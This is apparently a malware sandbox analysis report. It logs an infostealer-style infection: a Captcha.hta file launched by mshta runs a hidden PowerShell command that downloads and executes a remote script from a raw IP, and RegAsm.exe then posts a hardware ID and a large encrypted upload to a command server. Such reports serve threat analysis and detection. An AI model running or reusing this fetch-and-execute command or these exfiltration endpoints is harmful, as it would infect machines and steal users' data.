                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bo0vCoyCpIiNP3fQxsy89qoqA6RM%2B7zK064ZcJAc871rL%2FOab9PU1LnCBEqAYphzOx9u5jNshe%2FirtFqv37RllFvQwDyMbGhOTdQto7fAqPJTB9wydHcAHQZM%2BR7LIeaRvIG"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f0bca912d1343e3-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1728&rtt_var=665&sent=16&recv=26&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21406&delivery_rate=1689814&cwnd=229&unsent_bytes=0&cid=763827ac7847e406&ts=1409&x=0"
                                                                        2024-12-12 06:52:23 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                        Data Ascii: fok 8.46.123.175
                                                                        2024-12-12 06:52:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49746 | Destination IP: 172.67.206.64 | Destination Port: 443 | PID: 7184 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-12-12 06:52:25 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=442XREIEZD5L
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 1233
                                                                        Host: covery-mover.biz
                                                                        2024-12-12 06:52:25 UTC | 1233 | OUT | Data Raw: 2d 2d 34 34 32 58 52 45 49 45 5a 44 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 41 41 36 41 32 43 37 31 33 32 34 41 33 32 42 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 34 34 32 58 52 45 49 45 5a 44 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 34 32 58 52 45 49 45 5a 44 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 6f 74 64 65 6c 0d 0a 2d 2d 34 34 32 58 52 45 49 45 5a 44 35 4c 0d 0a
                                                                        Data Ascii: --442XREIEZD5LContent-Disposition: form-data; name="hwid"2AA6A2C71324A32B23D904AF30EFEBBC--442XREIEZD5LContent-Disposition: form-data; name="pid"1--442XREIEZD5LContent-Disposition: form-data; name="lid"DUkgLv--otdel--442XREIEZD5L
                                                                        2024-12-12 06:52:26 UTC | 1020 | IN | HTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=dvfdf2j59p04i2qnn05jn9un1q; expires=Mon, 07-Apr-2025 00:39:05 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BDRv88opEcsA5Lami2v8j0EuAnkwxlw5KRuH9DsMOA66OzeHWrwutM3VE2v3xp%2FuN82lcxPHvDmn%2FSAtoC5XPWehSAs%2B9U%2BWzScQibUognjDo%2BLlK%2Bz3mJn%2BRgVTdWW4YvN8"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f0bcaa54ac118b4-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1641&rtt_var=618&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2144&delivery_rate=1766485&cwnd=196&unsent_bytes=0&cid=109b7109294a5f93&ts=729&x=0"
                                                                        2024-12-12 06:52:26 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                        Data Ascii: fok 8.46.123.175
                                                                        2024-12-12 06:52:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49748 | Destination IP: 172.67.206.64 | Destination Port: 443 | PID: 7184 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-12-12 06:52:28 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=T3IXJXPW7E9RKTS2P7E
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 583787
                                                                        Host: covery-mover.biz
                                                                        2024-12-12 06:52:28 UTC | 15331 | OUT | Data Raw: 2d 2d 54 33 49 58 4a 58 50 57 37 45 39 52 4b 54 53 32 50 37 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 41 41 36 41 32 43 37 31 33 32 34 41 33 32 42 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 54 33 49 58 4a 58 50 57 37 45 39 52 4b 54 53 32 50 37 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 33 49 58 4a 58 50 57 37 45 39 52 4b 54 53 32 50 37 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 6f 74
                                                                        Data Ascii: --T3IXJXPW7E9RKTS2P7EContent-Disposition: form-data; name="hwid"2AA6A2C71324A32B23D904AF30EFEBBC--T3IXJXPW7E9RKTS2P7EContent-Disposition: form-data; name="pid"1--T3IXJXPW7E9RKTS2P7EContent-Disposition: form-data; name="lid"DUkgLv--ot
                                                                        2024-12-12 06:52:28 UTC | 15331 | OUT | Data Raw: 6c 17 ae cd d7 d3 b5 53 da 7d 5b 36 f6 3d 6b 58 2c 3c 16 18 a1 c2 87 b8 49 14 9e 04 cd 16 ca 52 a3 cf 29 52 ce 97 b1 7f 62 ec 50 7e f3 3f be 6a 51 8c 0b 1b d2 2f 26 1d bf b6 6a d6 bb ab 73 d8 16 19 15 55 c9 db 26 b3 dc 9c 26 ba f5 8a 9a 54 e2 a0 bd 4f e8 62 96 2a 36 a2 22 fe 38 13 78 1f 84 ca 2e d5 cc 94 5e e3 c7 0d 0c 6e e5 15 12 1f c3 5e ea 84 81 12 a5 4a 04 fd 79 7a a3 a1 36 66 e8 c8 d9 49 ed f0 bf 3e ee 13 b5 c1 dc 6e e9 27 38 f3 3f 2f 3c 38 b5 66 3e 23 d3 55 f5 20 5b 1d cd 9e 56 37 65 bf 7f 9f 0a d1 77 98 0a d9 d0 57 cd 3b d8 54 3d 51 0d 4a 92 f6 84 14 de 9d 69 e9 e2 3c 93 5f 81 1b e4 ef 81 b6 a0 ea e8 de 84 d3 9c 1d b3 85 26 61 ee 87 52 f6 e2 a6 19 43 2e 6e 3e ca 5d ab bc 21 bc 0d e7 f3 d7 d7 6b 0e 52 cf b3 d3 e7 7d 62 84 01 d0 8b a0 5a a3 52 68 96
                                                                        Data Ascii: lS}[6=kX,<IR)RbP~?jQ/&jsU&&TOb*6"8x.^n^Jyz6fI>n'8?/<8f>#U [V7ewW;T=QJi<_&aRC.n>]!kR}bZRh
                                                                        2024-12-12 06:52:28 UTC | 15331 | OUT | Data Raw: 99 c6 96 eb eb 05 82 c0 26 d3 d4 8a 8d 33 62 59 df 43 5c 93 00 df c6 f2 15 4f 88 cc 01 0a 93 00 b9 99 c0 1e 28 cf d9 e1 27 0f 54 31 8d 5b b1 44 c2 46 2a 08 b7 81 fc ff ed 3d 24 e1 c7 30 76 41 bd a6 25 b9 37 5e 51 6c 14 d8 93 9a 5e 36 42 c1 f3 a3 71 1c a0 f8 a9 18 ec cf 9b 29 ed be f1 e4 30 41 25 20 bd 8b 29 37 9b ad 63 e9 5c 67 6d 84 12 f5 b2 78 1e cd c1 20 d8 4d 59 1b ca 7b a1 10 4d 1f da 02 8b 1e 87 cc 2e 36 48 0a ea ba 9d 7f af 74 c1 6f 5f a4 90 da eb 54 1a e1 3b 2d 33 03 4e e0 f3 85 a0 93 17 55 7f df 61 2b 09 22 99 84 41 74 93 dd e5 3c ce 15 31 6c 66 2b cc 2f f6 7a 3d 09 e0 9b b4 be b3 d9 fd 55 40 b9 a6 12 ab b9 e6 d5 f5 34 d4 ce 65 63 e0 31 ac cc e9 36 83 6e 9d 46 cc ef e5 71 1a 6d 85 a8 fb 30 27 25 cf 93 3a 18 91 5e bc 31 84 e7 11 df 78 44 5d 21 de
                                                                        Data Ascii: &3bYC\O('T1[DF*=$0vA%7^Ql^6Bq)0A% )7c\gmx MY{M.6Hto_T;-3NUa+"At<1lf+/z=U@4ec16nFqm0'%:^1xD]!
                                                                        2024-12-12 06:52:28 UTC | 15331 | OUT | Data Raw: 36 93 9e 9e 71 4d 84 f9 9b 5c 92 6c 98 c2 f3 3d 30 40 90 52 a1 26 50 2c d4 2c 1a db 50 77 05 65 a0 8a 5c 5e 1f d2 87 0c 5f 77 97 4e 1c 30 8c 0a df 0b 8e 1b 20 ce 18 17 f1 45 07 dd c3 30 56 47 9a ef 6f 98 24 1a 83 95 94 8b ac 3f 7a 06 fd c7 52 87 66 9e 87 af 40 39 c8 e0 8b 0e c4 ae c4 ed ea 23 77 5f 35 df b2 36 7e c4 b0 e9 08 f2 00 82 90 73 cf 39 bb 02 c5 df 9d 55 4b 83 b5 2a 05 9c d3 03 42 64 5f ce 51 f6 18 0a 84 67 b7 d4 4a 64 5c fe 2f 7e 7f dc b9 e1 23 7d e1 cb 27 ef 0b 16 9d 03 5b 6c e6 05 cf d7 dc 1d 08 a0 04 78 6d 55 ee c1 56 77 5f b0 3f 1f 55 2d aa 5d 2a 00 0e 25 10 d9 90 eb bc b4 89 db 42 a9 fc 36 91 52 59 90 c7 22 fa d5 dd 89 8a 17 4e a9 f0 bd bd 09 3c e7 cb 4c 88 a6 80 b4 65 18 d9 cf 0d 6f a6 d0 37 22 ef 70 4e 42 bc 09 f0 c8 a5 0c 80 fc 4e 10 bf
                                                                        Data Ascii: 6qM\l=0@R&P,,Pwe\^_wN0 E0VGo$?zRf@9#w_56~s9UK*Bd_QgJd\/~#}'[lxmUVw_?U-]*%B6RY"N<Leo7"pNBN
                                                                        2024-12-12 06:52:28 UTC | 15331 | OUT | Data Raw: 79 fd c0 4d 68 c6 a2 78 f2 eb b0 18 28 a9 f1 10 e4 1c c8 15 ae d7 01 5e 6a f5 b3 9c 0b 5b 29 07 11 3a 54 9b 7a 15 30 fa 5b 3d 98 5e 20 b5 be e2 ca 93 f6 d6 ba 0e f3 13 4e 5d f5 87 d1 50 9c 93 c8 6b 6f 9e 50 78 ad 69 8d 47 a9 29 45 45 b2 07 84 eb f9 72 45 70 8a 7e 4a 07 b9 b9 d1 21 8e d0 2b d9 75 d2 ca e7 a5 35 1a 56 2c a9 39 d7 54 e4 b7 9b c4 18 34 d4 55 75 2b a1 be 33 f2 9e 98 c5 5e 11 97 09 3e 54 6b 25 09 4e dc 68 bc b4 e3 2d 30 e7 b8 37 9a ed 08 7d ed 87 cf f7 d7 cf 6c 8e fc e8 d3 93 62 cb 6b 34 d2 66 5a f6 6b 8f 46 c4 c6 a4 31 78 42 a1 78 79 d7 2f f7 2b 57 cb 54 00 cd 55 65 70 7a 09 32 ab 0e b7 cb 51 51 c5 cf 87 b6 af ac f9 8d b6 6d 58 56 b4 ac bd de 74 8b 8b ac 5b 57 3b c8 93 a8 a2 32 d0 b8 11 ef 71 48 24 cd 90 8b da 06 ec 4d f3 34 43 7f 8e 8e 72 db
                                                                        Data Ascii: yMhx(^j[):Tz0[=^ N]PkoPxiG)EErEp~J!+u5V,9T4Uu+3^>Tk%Nh-07}lbk4fZkF1xBxy/+WTUepz2QQmXVt[W;2qH$M4Cr
                                                                        2024-12-12 06:52:28 UTC | 15331 | OUT | Data Raw: f7 38 72 1c 26 06 15 e2 c3 1d c1 ea e2 f1 f8 27 a8 d0 0e a3 e3 31 67 0f 9e a3 2f 16 78 73 b3 c7 e2 e7 89 f5 d1 2e 9f aa 43 95 7e 2b be e8 df 6e bb 8f eb 06 b0 bc 52 b1 36 f0 64 db 2a 3c 88 38 cc b4 e8 56 79 9d 96 23 b1 29 26 3d 1d 52 b2 85 dd da 9b 32 62 b1 37 f3 06 be ac c1 44 66 02 9a 1f be c7 08 5c 74 95 0f d5 77 6e ad 31 f6 c4 88 9c a9 42 e0 bc 54 72 cc a2 78 6b c8 e3 d4 b1 d9 e4 6a 87 03 5e 13 7d 6a 85 e9 05 a2 33 64 a4 f9 24 df f7 22 5f c1 be 18 2f 75 9d ec 5d ca ea 18 55 c0 0b 89 8a 32 d7 e6 53 0b b1 fd fe 99 2e 36 93 02 87 75 9a bd 7d b7 f6 09 25 27 ec cd d3 e1 f2 e9 25 42 46 9e a0 f8 d0 c8 0e 90 b9 70 8e d9 c0 38 74 d9 23 d6 14 cb 9a fa 58 f0 a9 b2 0b 72 4b 09 13 40 8e b0 23 7e c5 3f 21 d2 08 d8 c5 5c 9e a9 81 69 a0 46 25 6c 72 7a 26 a7 19 07 f6
                                                                        Data Ascii: 8r&'1g/xs.C~+nR6d*<8Vy#)&=R2b7Df\twn1BTrxkj^}j3d$"_/u]U2S.6u}%'%BFp8t#XrK@#~?!\iF%lrz&
                                                                        2024-12-12 06:52:28 UTC | 15331 | OUT | Data Raw: 03 4e c4 6c 99 3d 9e 1d c5 ee ab 43 ea d5 bd f4 15 ad 77 08 2b ab 97 f5 9a ad 4c 39 9a e4 ce 3d 2a c6 7b 85 0f 1f 4e 1b 43 34 05 db ec 33 97 3e 5d fe 37 db 21 7f 47 e9 4a 8b e1 b3 fe bb 55 c6 a5 73 5d fd 7f 5f b9 5b fa ad f6 9f 57 77 ca f6 95 2e 4d ea ee 26 70 7b 5b ff ae e2 fe 19 de 43 d8 58 4a 6b c5 2e be 52 06 3d 69 02 83 14 18 16 11 30 a9 da bc 2e 0a d2 18 60 b1 6e fc f7 21 90 8d 82 99 da 99 5a 38 0b 40 c8 86 50 08 84 38 58 17 87 72 5e 0f a8 fd 3a 8d e4 85 52 70 72 cb ec 83 3d 06 08 5e b8 28 7e 78 3f 21 6b f3 62 7f fa 47 8d ef 3b 45 4c d1 e1 30 fc ac e9 f2 72 77 77 e5 9f 85 ab a2 a9 61 6c c3 1c b3 0f 31 2c 6f ef 0d f7 17 8f 20 52 86 17 fd 10 98 b5 f6 16 06 22 82 d8 16 c9 ed e6 88 bc e5 f5 92 47 cd b7 2f 8b 6a e2 79 29 b6 ff e8 d2 c3 0b 9e f8 b6 7f e0
                                                                        Data Ascii: Nl=Cw+L9=*{NC43>]7!GJUs]_[Ww.M&p{[CXJk.R=i0.`n!Z8@P8Xr^:Rpr=^(~x?!kbG;EL0rwwal1,o R"G/jy)
                                                                        2024-12-12 06:52:28 UTC | 15331 | OUT | Data Raw: 24 30 eb 77 69 c3 b2 3d 59 f1 c9 e1 fd 46 b7 01 d3 91 41 20 ad a8 78 e3 ef 84 a6 6e 31 e2 a5 9d f7 40 f4 0c 2b 75 78 f0 1d b7 0d a5 35 1f 94 ec 2b 51 39 89 7c b4 b0 16 92 71 b4 ca 9f 9d 0c e2 86 18 61 46 ac 82 f8 cd 49 7e 30 c2 b7 4a ba 33 71 74 a3 2f 23 e7 3f d7 f2 bb 8c e0 62 d6 cd bb 06 73 11 f3 4a 77 b8 39 82 83 05 5f 76 a7 fd 30 b9 6f b7 e1 bd 58 da 96 a6 94 d2 1a 5a 53 e1 72 e9 d2 e6 26 9b c5 b9 1f 6f c6 d1 67 1c 9d 5b b6 08 9c 90 82 7b 2d 24 ba 01 35 46 e2 7f c1 63 36 b8 9c f9 98 c0 b2 1c 39 12 c9 99 2d 9f 70 75 19 9c 29 5f ee 5e e1 20 15 15 43 ca d8 2c 94 16 96 36 99 f2 d4 bf 64 41 09 b7 a6 29 10 83 b1 e4 23 f1 59 96 36 11 24 09 59 bf 08 e7 06 90 7a 15 5b 3b 2c 2a dc 7f 2f 28 b4 56 52 8e 10 12 8b be 31 e2 08 32 9a 1b 9c 73 c0 66 68 04 da 75 ad 16
                                                                        Data Ascii: $0wi=YFA xn1@+ux5+Q9|qaFI~0J3qt/#?bsJw9_v0oXZSr&og[{-$5Fc69-pu)_^ C,6dA)#Y6$Yz[;,*/(VR12sfhu
                                                                        2024-12-12 06:52:28 UTC | 15331 | OUT | Data Raw: 0c 51 2c 28 71 f4 67 b2 f4 a8 ef 80 52 ef 6a b3 ae bf 59 90 87 5f 0f 55 82 b2 5b 9a 47 69 43 e7 a1 1c 1a 12 b4 88 cd ff c9 28 24 97 a1 82 2e 90 dc 48 b0 ca c9 df 33 c7 a5 a9 1f 13 75 46 57 2f ba 25 06 61 ba 82 be d6 30 c1 ca ee 19 9b 7a fb b6 75 c7 53 bf fe d4 d5 fe bd 2d c8 2e 7f 81 47 14 1d 79 33 21 e4 dd 08 ca eb d2 e8 a4 e5 1b 61 70 12 da ab 35 6d f4 59 75 8a 50 c0 c2 b7 0c ca cc c2 2e 4c 8d 13 f9 26 6a 17 ea db 2a 4d 8e b0 ec 4f bd 06 bc 7e 24 ec 8f e0 e7 18 a0 9b 0b 2d a3 18 9c b2 3c b4 0b 5f 7e 82 9a c7 c6 40 3e 95 c8 26 45 57 dd 45 db d1 b3 8d 00 0e 2b b5 8d 14 db 9d b2 8b a7 da 2a 38 5a 82 35 c0 42 bf d6 5f bc 72 d9 4f 3b ba ee f6 10 19 96 6f 80 30 78 bc 90 e2 e5 b7 2a ca f7 1a ec 75 67 76 ad bd 50 15 7a 6c ac 73 3f 2a fd 02 eb 08 52 75 56 03 9f
                                                                        Data Ascii: Q,(qgRjY_U[GiC($.H3uFW/%a0zuS-.Gy3!ap5mYuP.L&j*MO~$-<_~@>&EWE+*8Z5B_rO;o0x*ugvPzls?*RuV
                                                                        2024-12-12 06:52:28 UTC | 15331 | OUT | Data Raw: 22 40 68 68 9a 78 a1 7c e2 f4 f5 e2 91 7e ff 24 8e 02 a5 34 57 b9 31 c1 c3 30 87 bf 99 cf 2a cb d1 57 61 35 87 91 a0 d6 fe ba a6 3d 74 e0 2a 2b 5f 95 ef 10 d3 ca 3e 3b 68 e5 3c ae 77 3a 45 1d aa fa 46 2e 81 2c 2b 65 30 b3 75 c6 d0 46 f5 14 19 99 e6 d0 46 45 8d f2 5c 33 61 4e ab 9b 76 fe d9 6f 7d 49 a8 36 89 e2 34 19 41 29 c3 bc 12 71 c8 bb 4c ae 0d 93 85 b6 c8 7c aa 14 02 22 76 45 81 84 a3 2c ce ba ff 18 91 dd 17 d3 1e 5a 8a 6b ae 0b c8 7f c5 40 e7 ec 52 2c ff 77 9c 94 fd 51 69 ed 9b 1c ed db f2 e9 01 b6 88 72 04 83 3c ff eb 22 ae 30 d9 8a 59 e3 dd 8f 52 dd d3 1f 52 24 dd a7 3b b5 cc 72 a8 cb 8a b4 af 7d a7 52 4e 60 fd c8 4c 29 2d 3a 4f 6c fa 56 de ad 1c 56 e8 a7 2d d9 ff 4e 98 39 31 bf 1d 90 9c 62 43 71 5f 2d 4e 85 0f fc eb 65 b0 67 f9 43 dd ec 8b d9 c8
                                                                        Data Ascii: "@hhx|~$4W10*Wa5=t*+_>;h<w:EF.,+e0uFFE\3aNvo}I64A)qL|"vE,Zk@R,wQir<"0YRR$;r}RN`L)-:OlVV-N91bCq_-NegC
                                                                        2024-12-12 06:52:32 UTC | 1021 | IN | HTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:32 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=tgspmb9ck8fiq0qb9o2sar4q4v; expires=Mon, 07-Apr-2025 00:39:10 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZPN%2Bc4ZhbtgyX4TTFpOACp0EkCO9trHYqjDfRtul90a2fotxHh5nRmmStCHmn3DXg854zTanWoEZ1mEa6fR0htdjqS%2Bvu%2BrBXTFvkeEQsBUxo5aXiqNIljWK7P%2B%2FFVJd5fiV"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f0bcab7bac6c336-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1441&min_rtt=1431&rtt_var=556&sent=353&recv=605&lost=0&retrans=0&sent_bytes=2842&recv_bytes=586379&delivery_rate=1932495&cwnd=244&unsent_bytes=0&cid=eb0690af9023d959&ts=3658&x=0"


                                                                        Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49750 | Destination IP: 172.67.206.64 | Destination Port: 443 | PID: 7184 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-12-12 06:52:33 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 82
                                                                        Host: covery-mover.biz
                                                                        2024-12-12 06:52:33 UTC | 82 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 55 6b 67 4c 76 2d 2d 6f 74 64 65 6c 26 6a 3d 26 68 77 69 64 3d 32 41 41 36 41 32 43 37 31 33 32 34 41 33 32 42 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43
                                                                        Data Ascii: act=get_message&ver=4.0&lid=DUkgLv--otdel&j=&hwid=2AA6A2C71324A32B23D904AF30EFEBBC
                                                                        2024-12-12 06:52:34 UTC | 1009 | IN | HTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:34 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=vqoagqtr9f6qcro6a9re968fbf; expires=Mon, 07-Apr-2025 00:39:13 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ukFsws0pMHI2aSQQ8egw8mkH2jB%2BLpTjR7OX2HYwJ8%2BuvYIX6ej1mM2H4sbjjmb62Zwi0X7MMDdgK53iLhp3J43QgUvGQyCnVOIHsCfVkdyR7WaaDiPeJ7P12KYgA59jaFM%2F"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f0bcad6c9647d26-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1805&rtt_var=684&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=982&delivery_rate=1590413&cwnd=194&unsent_bytes=0&cid=ad7de43d37748398&ts=825&x=0"
                                                                        2024-12-12 06:52:34 UTC | 54 | IN | Data Raw: 33 30 0d 0a 64 67 7a 68 37 6c 5a 48 31 65 4b 64 36 65 62 64 4a 36 2f 51 77 7a 6c 45 54 2f 63 7a 70 45 2f 62 49 76 7a 43 57 7a 50 4e 44 72 34 74 55 51 3d 3d 0d 0a
                                                                        Data Ascii: 30dgzh7lZH1eKd6ebdJ6/QwzlET/czpE/bIvzCWzPNDr4tUQ==
                                                                        2024-12-12 06:52:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Target ID:0
                                                                        Start time:01:52:01
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\SysWOW64\mshta.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:mshta.exe "C:\Users\user\Desktop\Captcha.hta"
                                                                        Imagebase:0xa10000
                                                                        File size:13'312 bytes
                                                                        MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:1
                                                                        Start time:01:52:02
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex"
                                                                        Imagebase:0x790000
                                                                        File size:433'152 bytes
                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:2
                                                                        Start time:01:52:02
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:01:52:02
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                        Imagebase:0x7ff6eef20000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:4
                                                                        Start time:01:52:04
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline"
                                                                        Imagebase:0x7e0000
                                                                        File size:2'141'552 bytes
                                                                        MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:01:52:09
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.cmdline"
                                                                        Imagebase:0x7e0000
